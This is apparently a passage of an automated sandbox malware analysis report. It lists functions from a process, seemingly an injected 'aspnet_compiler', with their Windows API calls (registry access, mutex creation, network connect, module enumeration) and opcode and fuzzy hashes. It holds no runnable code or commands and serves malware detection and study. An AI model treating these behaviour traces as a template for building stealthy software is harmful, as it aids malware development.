                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 176 5d41277-5d412d7 177 5d412da-5d41332 RasEnumConnectionsW 176->177 179 5d41338-5d4134e 177->179
                                                                                                                                                                        APIs
                                                                                                                                                                        • RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 05D4132A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConnectionsEnum
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3832085198-0
                                                                                                                                                                        • Opcode ID: 86bc084155163c916ae261150a0afe9b0b3a8dbceaf0f15247694f03772a0fdf
                                                                                                                                                                        • Instruction ID: 82df82916969358f9fb454797884e8c3f409db073ae7f8cbc8c4f0a8c9c05ab0
                                                                                                                                                                        • Opcode Fuzzy Hash: 86bc084155163c916ae261150a0afe9b0b3a8dbceaf0f15247694f03772a0fdf
                                                                                                                                                                        • Instruction Fuzzy Hash: 83316D7554E3C05FD3138B358C65A65BFB4EF47610B0A81DBD884CF5A3D229A84ACBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41CC9, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 180 5d41cc9-5d41d45 184 5d41d47 180->184 185 5d41d4a-5d41d53 180->185 184->185 186 5d41d55 185->186 187 5d41d58-5d41d61 185->187 186->187 188 5d41db2-5d41db7 187->188 189 5d41d63-5d41d87 CreateMutexW 187->189 188->189 192 5d41db9-5d41dbe 189->192 193 5d41d89-5d41daf 189->193 192->193
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 05D41D69
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1964310414-0
                                                                                                                                                                        • Opcode ID: c5103f5100b78ddc98bc484d977ebb2e3a98b9f4bafd1f96d1d74ec444be0ab3
                                                                                                                                                                        • Instruction ID: 47a7849b8db74d7dde148da6158f2b5e43bdda6821c23119d14a31a2077f2ca4
                                                                                                                                                                        • Opcode Fuzzy Hash: c5103f5100b78ddc98bc484d977ebb2e3a98b9f4bafd1f96d1d74ec444be0ab3
                                                                                                                                                                        • Instruction Fuzzy Hash: 0B31D4B1509780AFE722CF25CC85F56FFE8FF05210F0885AAE9858B252D324E948CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D423F0, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 196 5d423f0-5d42481 200 5d42483-5d4248b RegOpenCurrentUser 196->200 201 5d424ce-5d424d3 196->201 202 5d42491-5d424a3 200->202 201->200 204 5d424d5-5d424da 202->204 205 5d424a5-5d424cd 202->205 204->205
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenCurrentUser.KERNELBASE(?,00000E2C), ref: 05D42489
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentOpenUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1571386571-0
                                                                                                                                                                        • Opcode ID: 56c4e6a189da544cc09523bb091136e30d94caa76a17c7c9df411109f6777bf4
                                                                                                                                                                        • Instruction ID: 562fb9e256a6e7fb2aa04e9a4d4a4b774b0175fa33666e8e27489744cee0f97a
                                                                                                                                                                        • Opcode Fuzzy Hash: 56c4e6a189da544cc09523bb091136e30d94caa76a17c7c9df411109f6777bf4
                                                                                                                                                                        • Instruction Fuzzy Hash: 6421B1754093846FEB228B299C45F66BFA8EF46310F09849BED849F153D264A909CB71
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134B639, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 209 134b639-134b6a3 213 134b6a5 209->213 214 134b6a8-134b6c2 209->214 213->214 216 134b6c4-134b6cc K32GetModuleInformation 214->216 217 134b70f-134b714 214->217 219 134b6d2-134b6e4 216->219 217->216 220 134b716-134b71b 219->220 221 134b6e6-134b70c 219->221 220->221
                                                                                                                                                                        APIs
                                                                                                                                                                        • K32GetModuleInformation.KERNEL32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134B6CA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3425974696-0
                                                                                                                                                                        • Opcode ID: 430754ecae3577a5428b6f2159d25950d1dd23bf80022fc167226d8869175d10
                                                                                                                                                                        • Instruction ID: 4257261d5d4ea6152acb02d815883881bccdd15bc76d171d76280a1114f574b9
                                                                                                                                                                        • Opcode Fuzzy Hash: 430754ecae3577a5428b6f2159d25950d1dd23bf80022fc167226d8869175d10
                                                                                                                                                                        • Instruction Fuzzy Hash: F421A671545380AFE722CF25DD45F66FFACEF46220F0884AAE984DB152D364E948CB71
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D40BA2, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MoveFileExW.KERNELBASE(?,?,?), ref: 05D40C39
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMove
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3562171763-0
                                                                                                                                                                        • Opcode ID: 7b8f078aea1a9cb1a397508d56406c34317dccb8561802f12ee1c9e34cbe6c4f
                                                                                                                                                                        • Instruction ID: 719d8eff37c110c55d471e7d357cfd972e0cb7648932f8dff39ec88f1f40f94c
                                                                                                                                                                        • Opcode Fuzzy Hash: 7b8f078aea1a9cb1a397508d56406c34317dccb8561802f12ee1c9e34cbe6c4f
                                                                                                                                                                        • Instruction Fuzzy Hash: 88313C7150E3C0AFDB138B24DC54A52BFB8EF57210B0984DBD985CF1A3D2249808CB72
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134B730, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 0134B7D1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 514040917-0
                                                                                                                                                                        • Opcode ID: 1104969aa1059a96c6fd936875ca466742f95df110223066bb553cedbc3cde34
                                                                                                                                                                        • Instruction ID: 583cf66c2e57b4fe17520a6143d02b5f0586f2ce697d30dd3d8472cfb7e05eca
                                                                                                                                                                        • Opcode Fuzzy Hash: 1104969aa1059a96c6fd936875ca466742f95df110223066bb553cedbc3cde34
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E21AD715093C0AFD312CB65CC55B66BFB8EF87610F0984DBD8849F1A3D624A909CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42EF2, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: select
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1274211008-0
                                                                                                                                                                        • Opcode ID: cd37cdcd0571aafb0ae9cca69504d892fb6a4fabf75b9e275903406550d5c48f
                                                                                                                                                                        • Instruction ID: 8e92cb79a4342d3c78d099bf7ab2d95007a21190828a889c63dcf926b71050af
                                                                                                                                                                        • Opcode Fuzzy Hash: cd37cdcd0571aafb0ae9cca69504d892fb6a4fabf75b9e275903406550d5c48f
                                                                                                                                                                        • Instruction Fuzzy Hash: AF213C755093849FEB22CF65D844BA2FFE8EF46310F0884DAED85CB162D224A948CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41EA4, Relevance: 1.6, APIs: 1, Instructions: 79timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessTimes.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D41F2D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessTimes
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1995159646-0
                                                                                                                                                                        • Opcode ID: f08c4f178bf4c816a8e535b4e86819949628c2e1afa1100749b40349ce4f020e
                                                                                                                                                                        • Instruction ID: 2ea458fbf8125636a2aea3224f5db240861def0021f83704b56b0afb3d6a952b
                                                                                                                                                                        • Opcode Fuzzy Hash: f08c4f178bf4c816a8e535b4e86819949628c2e1afa1100749b40349ce4f020e
                                                                                                                                                                        • Instruction Fuzzy Hash: 9221B571105380AFEB228F64DD45F67FFB8EF46310F04859AED859B152D334A449CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42516, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 05D42595
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: 0b40bcfba9c856f324f07ccead72c58373d748631373a624ca7a4f83956b06de
                                                                                                                                                                        • Instruction ID: 966bdc094cea764646c1d920ed4fd72b8903f9ed5d9fe7cac820a6f0f71ab49c
                                                                                                                                                                        • Opcode Fuzzy Hash: 0b40bcfba9c856f324f07ccead72c58373d748631373a624ca7a4f83956b06de
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E21B072500244AFEB21DF68DD44F6AFBACEF04310F04855AED85DB141D624E5088BB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42603, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegNotifyChangeKeyValue.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42694
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeNotifyValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3933585183-0
                                                                                                                                                                        • Opcode ID: 9d672504bf79bd4a97a224b6b2719cdcd39e529f2ecbd4a311e682c14d1bc416
                                                                                                                                                                        • Instruction ID: 0161a310a897979a7c6dffb620e1c104f1aff189ec5a493b14c2c0ce554beaab
                                                                                                                                                                        • Opcode Fuzzy Hash: 9d672504bf79bd4a97a224b6b2719cdcd39e529f2ecbd4a311e682c14d1bc416
                                                                                                                                                                        • Instruction Fuzzy Hash: 9521A371009384AFE722CF64DD45FA7FFACEF46310F04859BE9849B152D224A548CBB2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41932, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenFileMappingW.KERNELBASE(?,?), ref: 05D419BD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMappingOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1680863896-0
                                                                                                                                                                        • Opcode ID: cd78f03d6e7e69cd3c150f54025221b4ea8e76bbf235d65467ffbe71c5959e3e
                                                                                                                                                                        • Instruction ID: 214d7077e2f4448c477146621a70bc2bf6ba56633e684ff9012b246679b7a8f5
                                                                                                                                                                        • Opcode Fuzzy Hash: cd78f03d6e7e69cd3c150f54025221b4ea8e76bbf235d65467ffbe71c5959e3e
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D21D371509380AFE722CF65CC45F66FFA8EF05220F08849EED849B252D375E548CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D404F0, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,00000E2C), ref: 05D4058B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                        • Opcode ID: 3cc9090aaa5770b00c7b354767b746f596e53be5a7be24928b572a1b847760e2
                                                                                                                                                                        • Instruction ID: 4cf6825f79a321a93b536eba90390e028b121e28d70d35a51ee31140a915525b
                                                                                                                                                                        • Opcode Fuzzy Hash: 3cc9090aaa5770b00c7b354767b746f596e53be5a7be24928b572a1b847760e2
                                                                                                                                                                        • Instruction Fuzzy Hash: 2821C8711053806FE7228B14CD45FA6BFB8EF06324F1880DAED845F192C269A949CBB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D40E7A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 05D40EF9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: d3dfbf6c1c2e20911073e0c883ee4ebe4efa028ece2fc7b1b8d790300888b620
                                                                                                                                                                        • Instruction ID: fea5d105c98415de051c0de507f563c51605f2e13a84feb0172fbedee75aab61
                                                                                                                                                                        • Opcode Fuzzy Hash: d3dfbf6c1c2e20911073e0c883ee4ebe4efa028ece2fc7b1b8d790300888b620
                                                                                                                                                                        • Instruction Fuzzy Hash: F2219C71504244AFE721CF69CD48B66FBE8FF08310F04846AEE899B652D331E508CB65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134B498, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 0134B532
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        • Opcode ID: e194b6934f8481cb9c0f849851987e0a341c1605fbdb848781cce3b75c80f650
                                                                                                                                                                        • Instruction ID: b5cfc9acf97aabff0ddcbf33f485d7aa34b3370cdce10533b2724500f218e6bf
                                                                                                                                                                        • Opcode Fuzzy Hash: e194b6934f8481cb9c0f849851987e0a341c1605fbdb848781cce3b75c80f650
                                                                                                                                                                        • Instruction Fuzzy Hash: 6F21F5755093C06FD3138B25CC51B62BFB8EF87A10F0A81CBE8848B653D225A919C7B2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42C6F, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42D01
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AdaptersAddresses
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2506852604-0
                                                                                                                                                                        • Opcode ID: 834f853abb448491ec77f1c80bdb058c3cec2cd5176bc48f57c70fa196f8bd0a
                                                                                                                                                                        • Instruction ID: 37ef840cc2f956cfb4913a40e74f5d4a25a6b395300f378c7116450ef27f99df
                                                                                                                                                                        • Opcode Fuzzy Hash: 834f853abb448491ec77f1c80bdb058c3cec2cd5176bc48f57c70fa196f8bd0a
                                                                                                                                                                        • Instruction Fuzzy Hash: B621A775009780AFE7228F25CD45FA6FFB8EF06310F0885DBE9849B152D365A509CBB2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134A90A, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0134A989
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: e5f1218f2e378093fdd9b9137ca6b5e8a140ef999f3f3fea30d618eee0567f5f
                                                                                                                                                                        • Instruction ID: f203cb635df065fe33060492fdc7879102dc42caf16da374e12ee8e6f4cd3d16
                                                                                                                                                                        • Opcode Fuzzy Hash: e5f1218f2e378093fdd9b9137ca6b5e8a140ef999f3f3fea30d618eee0567f5f
                                                                                                                                                                        • Instruction Fuzzy Hash: 7721D476500208AFE7229F19CD45F6BFBECEF04310F04855AED859B642D674E5088BB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42256, Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WSAEventSelect.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D422DA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EventSelect
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 31538577-0
                                                                                                                                                                        • Opcode ID: 9cad777c9e3fc1594c910d42872cf39e39fa013c5eadbea9b5dd1f52d691d368
                                                                                                                                                                        • Instruction ID: ed86c5938f7a915a898cbf636010f3247a521579e181fc49065454de59b81daa
                                                                                                                                                                        • Opcode Fuzzy Hash: 9cad777c9e3fc1594c910d42872cf39e39fa013c5eadbea9b5dd1f52d691d368
                                                                                                                                                                        • Instruction Fuzzy Hash: B52183714053846FE712CB65DD45FA7FFACEF46310F1485ABE944AB152D234A508CBB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42716, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 05D4278A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: 6b493d96bdcc87e9ae90a1097a7e96e82e74fa2528e79734a88adb27ade8888a
                                                                                                                                                                        • Instruction ID: f75af3bfda6a76e601f4245358ec201e0b1e877cfbb33bc2d1673e2d815ca9d6
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b493d96bdcc87e9ae90a1097a7e96e82e74fa2528e79734a88adb27ade8888a
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A21D175500204AFEB21DF18DD85F6BFBACEF04320F14845BED849B642D274E4088BB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42E2D, Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05D42EB2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Connect
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3144859779-0
                                                                                                                                                                        • Opcode ID: a7d099ca60a84e5d1b769b907be5fbd6f21d8d83c6f37f4a17845c187b43fd92
                                                                                                                                                                        • Instruction ID: 378b436f9f78821273c55ed35d1dd3c1f8826613bbcd0fb2e0ef691f5474ccf7
                                                                                                                                                                        • Opcode Fuzzy Hash: a7d099ca60a84e5d1b769b907be5fbd6f21d8d83c6f37f4a17845c187b43fd92
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B213B75509380AFDB228F65DC44B62BFB4FF46320F1885ABED858B162D335A848DB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134B55E, Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134B5DA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumModulesProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1082081703-0
                                                                                                                                                                        • Opcode ID: a08b041b7e8d68e8e23cc515137df14d7aadc948bf05ae9e5f2f30f3c829d64b
                                                                                                                                                                        • Instruction ID: ae292d992bea302e0908e396da01ad678b19c920275b8c7235e7b874b8c9ecf0
                                                                                                                                                                        • Opcode Fuzzy Hash: a08b041b7e8d68e8e23cc515137df14d7aadc948bf05ae9e5f2f30f3c829d64b
                                                                                                                                                                        • Instruction Fuzzy Hash: 6521C2711093806FE722CF24DD45F67FFACEF46220F0884AAED85DB152C264A848CB71
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41CF6, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 05D41D69
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1964310414-0
